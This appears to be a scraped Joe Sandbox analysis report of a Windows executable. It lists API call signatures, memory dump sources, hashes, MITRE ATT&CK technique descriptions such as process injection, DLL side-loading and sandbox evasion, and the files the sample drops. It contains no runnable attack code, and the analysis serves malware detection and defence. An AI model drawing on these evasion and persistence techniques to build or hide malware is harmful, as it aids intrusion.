CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\5WP9WCM8qV.exe,C:\Users\user\Desktop\5WP9WCM8qV.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A6B

Strings

C:\Users\user\Desktop, xrefs: 00405A55

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1876063424
Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
Instruction ID: bc07cd37d8a58f62a2b9a6dad95115890aa924a9f687d43278fd1307a4d4e217
Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
Instruction Fuzzy Hash: 7ED05EB2400D209AD312A714DC84DAF77ACEF1530074A446BF441A31A0D7785D918AA9

Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
GlobalFree.KERNEL32(00000000), ref: 100011C7
GlobalFree.KERNEL32(00000000), ref: 100011D9
GlobalFree.KERNEL32(?), ref: 10001203

Memory Dump Source

Source File: 00000000.00000002.1530332334.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1530306848.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1530357897.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1530384976.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_5WP9WCM8qV.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765

Function 00405B8F Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 5WP9WCM8qV.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\BooConf.ini

C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll

C:\Users\user\AppData\Local\Temp\tmc.ini

C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes\Dominerendes.Ges

C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes\Sysselsttelser.Dry

C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes\annektere.boa

C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes\buduma.ves

C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes\isopodan.txt

C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes\sludredes.peb

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Windows Analysis Report
5WP9WCM8qV.exe

Function 004032A0 Relevance: 89.7, APIs: 32, Strings: 19, Instructions: 401
stringfilecomCOMMON

Function 004052F3 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 00406077 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Function 00405846 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 00403C41 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Function 0040389E Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402DEE Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182
COMMON

Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 004051B4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 00403027 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166
COMMON

Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151
fileCOMMON

Function 0040237B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Function 00405683 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON